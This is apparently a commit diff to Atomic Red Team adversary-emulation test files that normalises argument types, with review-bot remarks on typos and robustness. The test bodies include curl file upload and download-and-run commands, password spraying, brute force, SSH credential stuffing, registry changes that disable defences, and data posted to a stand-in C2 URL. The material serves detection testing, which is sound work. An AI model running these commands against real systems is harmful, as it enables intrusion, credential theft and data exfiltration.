prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
- description: |
A file must be created to upload
prereq_command: |
if (Test-Path #{file_path}) {exit 0} else {exit 1}
get_prereq_command: |
echo "This is an Atomic Test File" > #{file_path}
executor:
command: |
#{curl_path} -T #{file_path} #{remote_destination}
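Review bot: the `Invoke-WebRequest “https://curl.se/...”` line in get_prereq_command uses curly quotes (U+201C/U+201D) instead of ASCII `"`; PowerShell happens to accept them, but they break copy-paste into other shells and differ from the download test above, so normalise them. `file_path` (default `c:\temp\atomictestfile.txt`) should be `type: path`, and its get_prereq_command `echo "..." > #{file_path}` fails when `c:\temp` does not exist; create the directory first with `New-Item -ItemType Directory -Force (Split-Path #{file_path})`. The `Remove-Item $env:temp\curl` without `-Recurse` issue from the download test is repeated here.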
@@ -524,7 +524,7 @@ atomic_tests:
#{curl_path} --data #{file_path} #{remote_destination}
name: command_prompt
- name: Download a file with Microsoft Connection Manager Auto-Download
- name: Download a file with Microsoft Connection Manager Auto-Download
auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc
description: |
Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file.
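Review bot: `arbitary` in the description should be `arbitrary`, and `The cmdl32 package is allowed to install the profile used to launch the VPN connection` reads oddly; `cmdl32 installs the connection profile used to launch the VPN connection` is clearer.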
@@ -536,14 +536,14 @@ atomic_tests:
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
supported_platforms:
- windows
- windows
input_arguments:
Path_to_file:
description: Path to the Batch script
type: Path
type: path
default: PathToAtomicsFolder\T1105\src\T1105.bat
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{Path_to_file} must exist on system.
prereq_command: |
@@ -574,11 +574,11 @@ atomic_tests:
default: $env:comspec
exe_remote_folder:
description: Path to store executable on remote machine (no drive letter)
type: String
type: string
default: \Windows\Temp\T1105.exe
remote_drive_letter:
description: Remote drive letter
type: String
type: string
default: C
dependency_executor_name: powershell
dependencies:
@@ -621,15 +621,15 @@ atomic_tests:
description: |
Create a ZIP file from a folder in a remote drive
supported_platforms:
- windows
- windows
input_arguments:
Path_unc:
description: Path to the UNC folder
type: Path
type: path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\
Path_PrintBrm:
description: Path to PrintBrm.exe
type: Path
type: path
default: C:\Windows\System32\spool\tools\PrintBrm.exe
executor:
command: |
@@ -645,18 +645,18 @@ atomic_tests:
Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
supported_platforms:
- windows
- windows
input_arguments:
replace_cab:
description: Path to the cab file
type: Path
default: PathToAtomicsFolder\T1105\src\redcanary.cab
type: path
default: PathToAtomicsFolder\T1105\src\redcanary.cab
Path_replace:
description: Path to replace.exe
type: Path
type: path
default: C:\Windows\System32\replace.exe
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{replace_cab} must exist on system.
prereq_command: |
@@ -678,15 +678,15 @@ atomic_tests:
Copy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
supported_platforms:
- windows
- windows
input_arguments:
replace_cab:
description: UNC Path to the cab file
type: Path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab
type: path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab
Path_replace:
description: Path to replace.exe
type: Path
type: path
default: C:\Windows\System32\replace.exe
executor:
command: |
@@ -704,7 +704,7 @@ atomic_tests:
input_arguments:
local_path:
description: Local path to place file
type: String
type: string
default: '%temp%\Atomic-license.txt'
remote_file:
description: URL of file to copy
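Review bot: `local_path` here is `type: string` with default `'%temp%\Atomic-license.txt'`, whereas the same argument in the other T1105 tests in this file is `type: path`; make it `path`.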
@@ -723,10 +723,10 @@ atomic_tests:
input_arguments:
vbscript_file:
description: Full path to the VisualBasic downloading the file
type: String
type: string
default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{vbscript_file} must be exist on system.
prereq_command: |
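Review bot: grammar in the dependency description, `#{vbscript_file} must be exist on system` should be `#{vbscript_file} must exist on the system`; and `Full path to the VisualBasic downloading the file` in the argument description should be `Full path to the VBScript that downloads the file`.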
@@ -743,16 +743,16 @@ atomic_tests:
description: |
Utilize linux Curl to download a remote file, chmod +x it and run it.
supported_platforms:
- linux
- linux
input_arguments:
remote_url:
description: url of remote payload
type: string
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
payload_name:
description: payload name
type: string
default: atomic.sh
default: atomic.sh
executor:
command: |
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
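Review bot: the executor `curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}` pipes chmod's (empty) output into bash instead of sequencing the commands; `&&` is what is meant: `curl -fsO #{remote_url} && chmod +x #{payload_name} && bash #{payload_name}`. Adding `-f` matters because plain `-s` saves an HTML error body on a 404 and the next step would then execute it. If there is no cleanup_command removing `#{payload_name}`, add one.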
@@ -768,15 +768,15 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path:
description: Destination path to file
type: Path
type: path
default: $env:TEMP\Atomic-license.txt
local_nimgrab:
description: Local path to nimgrab
type: Path
type: path
default: $env:TEMP\nimgrab.exe
executor:
command: |
@@ -784,32 +784,32 @@ atomic_tests:
cleanup_command: |
del #{destination_path} >nul 2>&1
name: command_prompt
dependency_executor_name: powershell
dependencies:
- description: |
NimGrab must be installed on system.
prereq_command: |
if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force
Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
Remove-Item $env:temp\nim
Remove-Item $env:temp\nim.zip
- name: iwr or Invoke Web-Request download
dependency_executor_name: powershell
dependencies:
- description: |
NimGrab must be installed on system.
prereq_command: |
if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force
Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
Remove-Item $env:temp\nim
Remove-Item $env:temp\nim.zip
- name: iwr or Invoke Web-Request download
auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
description: |
description: |
Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
type: path
default: '%temp%\Atomic-license.txt'
executor:
command: |
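Review bot: `Remove-Item $env:temp\nim` in the nimgrab dependency removes a directory without `-Recurse`, so it prompts for confirmation and hangs unattended runs; use `Remove-Item $env:temp\nim -Recurse -Force`. The nim zip is downloaded with no hash check. In the following test, the name `iwr or Invoke Web-Request download` misspells the cmdlet; it is `Invoke-WebRequest`, as the description itself writes it.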
+4 -4
@@ -9,14 +9,14 @@ atomic_tests:
input_arguments:
source_file:
description: Location of the CSharp source file to compile and execute
type: Path
type: path
default: PathToAtomicsFolder\T1106\src\CreateProcess.cs
output_file:
description: Location of the payload
type: Path
type: path
default: '%tmp%\T1106.exe'
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{source_file} must exist on system.
prereq_command: |
+13 -13
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
user:
description: Account to bruteforce
type: String
type: string
default: '%username%'
executor:
name: command_prompt
@@ -31,19 +31,19 @@ atomic_tests:
input_arguments:
user:
description: Account to bruteforce
type: String
type: string
default: $ENV:USERNAME
passwords_path:
description: List of passwords we will attempt to brute force with
type: Path
type: path
default: PathToAtomicsFolder\T1110.001\src\passwords.txt
domain:
description: Active Directory domain FQDN
type: String
type: string
default: $env:UserDnsDomain
auth:
description: authentication method to choose between "NTLM" and "Kerberos"
type: String
type: string
default: NTLM
executor:
name: powershell
@@ -81,11 +81,11 @@ atomic_tests:
input_arguments:
username:
description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@<valid_ms_account.com>"
type: String
type: string
default: bruce.wayne@contoso.com
passwords:
description: List of passwords we will attempt to brute force with
type: String
type: string
default: Password1`n1q2w3e4r`nPassword!
dependency_executor_name: powershell
dependencies:
@@ -125,7 +125,7 @@ atomic_tests:
If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -152,7 +152,7 @@ atomic_tests:
description: |
Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -165,7 +165,7 @@ atomic_tests:
get_prereq_command: |
yum -y update && yum install -y openssl sudo
executor:
elevation_required: true
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
su target
@@ -189,18 +189,18 @@ atomic_tests:
name: sh
- name: Password Brute User using Kerbrute Tool
auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
description: |
description: |
Bruteforce a single user's password from a wordlist
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
type: string
default: $ENV:userdnsdomain
domain:
description: Domain where you will be testing
type: String
type: string
default: $ENV:userdomain
dependency_executor_name: powershell
dependencies:
+3 -3
@@ -9,15 +9,15 @@ atomic_tests:
input_arguments:
hashcat_exe:
description: Path to Hashcat executable
type: String
type: string
default: '%temp%\hashcat6\hashcat-6.1.1\hashcat.exe'
input_file_sam:
description: Path to SAM file
type: String
type: string
default: PathToAtomicsFolder\T1110.002\src\sam.txt
input_file_passwords:
description: Path to password list
type: String
type: string
default: PathToAtomicsFolder\T1110.002\src\password.lst
dependency_executor_name: powershell
dependencies:
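Review bot: hashcat_exe, input_file_sam and input_file_passwords are all described as paths ("Path to Hashcat executable", "Path to SAM file", "Path to password list") yet this hunk types them `string`, while the same commit types equivalent arguments `path` (source_file and output_file in the T1106 hunk, for example). Since the point of the change is to align types with the schema, `type: path` for these three keeps validators and the invoking framework treating path-valued arguments uniformly. The same remark applies to later hunks in this commit where a path-valued argument is typed `string`: user_list in T1110.003 ("File path to list of users"), and output_file and file_path in T1114.001.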
+31 -31
@@ -18,7 +18,7 @@ atomic_tests:
input_arguments:
password:
description: The password to try for each user in users.txt
type: String
type: string
default: Spring2020
dependencies:
- description: |
@@ -39,11 +39,11 @@ atomic_tests:
https://github.com/dafthack/DomainPasswordSpray
supported_platforms:
- windows
- windows
input_arguments:
domain:
description: Domain to brute force against
type: String
type: string
default: $Env:USERDOMAIN
executor:
name: powershell
@@ -62,15 +62,15 @@ atomic_tests:
input_arguments:
password:
description: single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
type: String
type: string
default: P@ssw0rd!
domain:
description: Domain FQDN
type: String
type: string
default: $env:UserDnsDomain
auth:
description: authentication method to choose between "NTLM" and "Kerberos"
type: String
type: string
default: NTLM
executor:
name: powershell
@@ -102,7 +102,7 @@ atomic_tests:
}
}
Write-Host "End of password spraying"
- name: Password spray all Azure AD users with a single password
- name: Password spray all Azure AD users with a single password
auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
description: |
Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
@@ -112,15 +112,15 @@ atomic_tests:
input_arguments:
password:
description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
type: String
type: string
default: P@ssw0rd!
valid_username:
description: Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg <valid_test_user>@<valid_ms_account.com>
type: String
type: string
default: bruce.wayne@contoso.com
valid_password:
description: Valid password to authenticate as valid_username in the <valid_ms_account>
type: String
type: string
default: iamthebatman
dependency_executor_name: powershell
dependencies:
@@ -176,15 +176,15 @@ atomic_tests:
This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually
or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.
supported_platforms:
- windows
- windows
input_arguments:
user_limit:
description: The max number of users to put in the list when running the prereq_command
type: Integer
type: integer
default: 200
password:
description: The password to try for each user in users.txt
type: String
type: string
default: Spring2020
dependencies:
- description: |
@@ -233,11 +233,11 @@ atomic_tests:
input_arguments:
password:
description: Single password to try against the list of user accounts
type: String
type: string
default: P@ssword1
user_list:
description: File path to list of users (one per line, formatted as user@subdomain.onmicrosoft.com)
type: String
type: string
default: $env:temp\T1110.003UserList.txt
dependency_executor_name: powershell
dependencies:
@@ -255,18 +255,18 @@ atomic_tests:
Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
- name: Password Spray using Kerbrute Tool
auto_generated_guid: c6f25ec3-6475-47a9-b75d-09ac593c5ecb
description: |
description: |
Test a single password against a list of users
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
type: string
default: $ENV:userdnsdomain
domain:
description: Domain where you will be testing
type: String
type: string
default: $ENV:userdomain
dependency_executor_name: powershell
dependencies:
@@ -297,22 +297,22 @@ atomic_tests:
input_arguments:
aws_account_id:
description: ID of the AWS account
type: String
type: string
default: "XXXXXXXX"
dependencies:
- description: |
Check if go is installed
prereq_command: |
go version
get_prereq_command: |
echo Install GO
- description: |
Check if go is installed
prereq_command: |
go version
get_prereq_command: |
echo Install GO
executor:
command: |
cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
cleanup_command: |
rm -rf /tmp/GoAWSConsoleSpray
rm -rf /tmp/GoAWSConsoleSpray
name: sh
elevation_required: false
elevation_required: false
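Review bot: the executor's `git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git` uses the SSH transport, so the test only succeeds on hosts that already have an SSH key registered with GitHub; the HTTPS form `https://github.com/WhiteOakSecurity/GoAWSConsoleSpray.git` clones a public repository without any credential setup. The dependencies block also checks only `go version` while the executor needs `git` as well, so a second prereq (or a combined check) would make the failure mode clearer. Only indentation changes in this hunk, but since the block is being touched it is a convenient moment to fix both.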
+21 -22
@@ -1,4 +1,3 @@
---
attack_technique: T1110.004
display_name: 'Brute Force: Credential Stuffing'
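Review bot: the header `@@ -1,4 +1,3 @@` records one line removed at the top of this file, but only the `---` document marker, attack_technique and display_name are visible, so it is not obvious which line went. If it is the `---` marker, YAML parsers do not care, but the T1133 hunk (`@@ -1,6 +1,5 @@`) shows the same pattern, so please confirm the removal is applied uniformly across the atomics rather than to a subset, otherwise file headers end up inconsistent after a commit whose purpose is consistency.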
@@ -9,22 +8,22 @@ atomic_tests:
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- linux
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
type: string
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
executor:
name: bash
@@ -39,23 +38,23 @@ atomic_tests:
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- macos
- macos
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
type: string
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
executor:
name: bash
@@ -66,18 +65,18 @@ atomic_tests:
- name: Brute Force:Credential Stuffing using Kerbrute Tool
auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde
description: |
description: |
Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
type: string
default: $ENV:userdnsdomain
domain:
description: Domain where you will be testing
type: String
type: string
default: $ENV:userdomain
dependency_executor_name: powershell
dependencies:
@@ -93,7 +92,7 @@ atomic_tests:
if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1}
get_prereq_command: |
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt"
executor:
executor:
name: powershell
elevation_required: false
command: |
+11 -11
@@ -25,7 +25,7 @@ atomic_tests:
input_arguments:
new_executable:
description: New executable to run on startup instead of Windows Defender
type: String
type: string
default: calc.exe
executor:
command: |
@@ -62,7 +62,7 @@ atomic_tests:
input_arguments:
bad_domain:
description: Domain to add to trusted site zone
type: String
type: string
default: bad-domain.com
executor:
command: |
@@ -99,7 +99,7 @@ atomic_tests:
input_arguments:
default_execution_policy:
description: Specify the default poweshell execution policy
type: String
type: string
default: Default
executor:
command: |
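Review bot: the description immediately above the changed type line reads "Specify the default poweshell execution policy"; since the line sits inside this hunk, fix the typo to "powershell" in the same commit rather than leaving it for a follow-up.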
@@ -225,7 +225,7 @@ atomic_tests:
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable Windows LogOff Button
- name: Disable Windows LogOff Button
auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
description: |
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
@@ -343,7 +343,7 @@ atomic_tests:
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
- name: Activate Windows NoClose Group Policy Feature
auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723
description: |
@@ -358,7 +358,7 @@ atomic_tests:
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
- name: Activate Windows NoSetTaskbar Group Policy Feature
auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed
description: |
@@ -622,8 +622,8 @@ atomic_tests:
- name: Ursnif Malware Registry Key Creation
auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
description: |
Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
supported_platforms:
- windows
executor:
@@ -636,7 +636,7 @@ atomic_tests:
- name: Terminal Server Client Connection History Cleared
auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
description: |
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -696,7 +696,7 @@ atomic_tests:
auto_generated_guid: fe7974e5-5813-477b-a7bd-311d4f535e83
description: |
Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.
See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
supported_platforms:
- windows
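Review bot: the description "Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP." is missing a space after the comma and writes Command_Prompt where executors elsewhere in this file are named command_prompt; worth tidying while the surrounding block is being reformatted.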
@@ -734,4 +734,4 @@ atomic_tests:
cleanup_command: |
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
+10 -10
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.png
executor:
command: |
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.png
executor:
command: |
@@ -44,15 +44,15 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.xwd
package_checker:
description: Package checking command for linux. Debian system command- dpkg -s x11-apps
type: String
type: string
default: rpm -q xorg-x11-apps
package_installer:
description: Package installer command for linux. Debian system command- apt-get install x11-apps
type: String
type: string
default: yum install -y xorg-x11-apps
dependency_executor_name: bash
dependencies:
@@ -78,7 +78,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.png
dependencies:
- description: |
@@ -98,15 +98,15 @@ atomic_tests:
description: |
Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
supported_platforms:
- windows
- windows
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: c:\temp\T1113_desktop.zip
recording_time:
description: Time to take screenshots
type: String
type: string
default: 5
executor:
name: powershell
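Review bot: recording_time ("Time to take screenshots", default 5) holds a number but this hunk types it `string`; the same commit types comparable numeric arguments `integer` (user_limit in the T1110.003 hunk, duration in the T1123 hunk), so `type: integer` would be the consistent choice. The description should also state the unit the value is measured in.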
@@ -129,7 +129,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: $env:TEMP\T1113.png
executor:
command: |
+2 -3
@@ -13,11 +13,11 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: String
type: string
default: $env:TEMP\mail.csv
file_path:
description: File path for Get-Inbox.ps1
type: String
type: string
default: PathToAtomicsFolder\T1114.001\src
dependency_executor_name: powershell
dependencies:
@@ -33,4 +33,3 @@ atomic_tests:
cleanup_command: |
Remove-Item #{output_file} -Force -ErrorAction Ignore
name: powershell
+6 -6
@@ -10,19 +10,19 @@ atomic_tests:
input_arguments:
username:
description: office-365 username
type: String
default: null
type: string
default:
password:
description: office-365 password
type: String
default: null
type: string
default:
rule_name:
description: email rule name
type: String
type: string
default: "Atomic Red Team Email Rule"
forwarding_email:
description: destination email addresses
type: String
type: string
default: "Atomic_Operator@fakeemail.aq"
dependency_executor_name: powershell
dependencies:
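Review bot: `default: null` becomes a bare `default:` for username and password; both forms parse to null in YAML, so nothing changes semantically, but if the new schema requires a string default for `type: string` arguments an empty value will fail validation just as `null` did. Either confirm the schema permits a null default or use `default: ""`. Having no usable default for a credential argument is the right behaviour; the question is only which spelling the schema accepts.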
+2 -2
@@ -45,7 +45,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
@@ -80,4 +80,4 @@ atomic_tests:
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt
name: sh
name: sh
+8 -8
@@ -29,26 +29,26 @@ atomic_tests:
- name: using Quicktime Player
auto_generated_guid: c7a0bb71-70ce-4a53-b115-881f241b795b
description: |
Use AppleScript to get Quicktime Player to record an audio file from the default microphone.
Use AppleScript to get Quicktime Player to record an audio file from the default microphone.
Should create a non-empty m4a file with sound from the microphone.
Should create a non-empty m4a file with sound from the microphone.
- requires Automation permissions but no additional microphone permissions
- saves file in /tmp by default. Other locations likely to require more permissions.
- requires Automation permissions but no additional microphone permissions
- saves file in /tmp by default. Other locations likely to require more permissions.
supported_platforms:
- macos
input_arguments:
filename:
description: Location of the script
type: Path
type: path
default: PathToAtomicsFolder/T1123/src/T1123.sh
audiofile:
description: Location of the recorded audio file
type: Path
type: path
default: /tmp/T1123.m4a
duration:
description: Length of recording to make in seconds
type: Integer
type: integer
default: 5
executor:
command: |
@@ -57,4 +57,4 @@ atomic_tests:
if test -w #{audiofile}; then
rm #{audiofile}
fi
name: sh
name: sh
+2 -2
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
computer_name:
description: computer name to query
type: String
type: string
default: localhost
executor:
command: |
@@ -32,7 +32,7 @@ atomic_tests:
description: |
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
supported_platforms:
- macos
- macos
executor:
command: |
date
+7 -7
@@ -10,15 +10,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127.001\src\T1127.001.csproj
msbuildpath:
description: Default location of MSBuild
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
msbuildname:
description: Default name of MSBuild
type: Path
type: path
default: msbuild.exe
dependency_executor_name: powershell
dependencies:
@@ -43,15 +43,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127.001\src\vb.xml
msbuildpath:
description: Default location of MSBuild
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
msbuildname:
description: Default name of MSBuild
type: Path
type: path
default: msbuild.exe
dependency_executor_name: powershell
dependencies:
@@ -65,4 +65,4 @@ atomic_tests:
executor:
command: |
#{msbuildpath}\#{msbuildname} #(unknown)
name: command_prompt
name: command_prompt
+7 -7
@@ -12,15 +12,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127\src\hello.js
jscpath:
description: Default location of jsc.exe
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
jscname:
description: Default name of jsc
type: Path
type: path
default: jsc.exe
dependency_executor_name: powershell
dependencies:
@@ -51,15 +51,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127\src\LibHello.js
jscpath:
description: Default location of jsc.exe
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
jscname:
description: Default name of jsc
type: Path
type: path
default: jsc.exe
dependency_executor_name: powershell
dependencies:
@@ -77,4 +77,4 @@ atomic_tests:
cleanup_command: |
del %TEMP%\LibHello.js
del %TEMP%\LibHello.dll
name: command_prompt
name: command_prompt
+5 -5
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: Url
type: url
default: redcanary.com
base64_data:
description: Encoded data to post using fake Social Security number 111-11-1111.
type: String
type: string
default: MTExLTExLTExMTE=
executor:
command: |
@@ -32,15 +32,15 @@ atomic_tests:
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: Url
type: url
default: example.com
plaintext:
description: Plain text mimicking victim data sent to C2 server.
type: String
type: string
default: Path\n----\nC:\Users\victim
key:
description: XOR key used for encoding the plaintext.
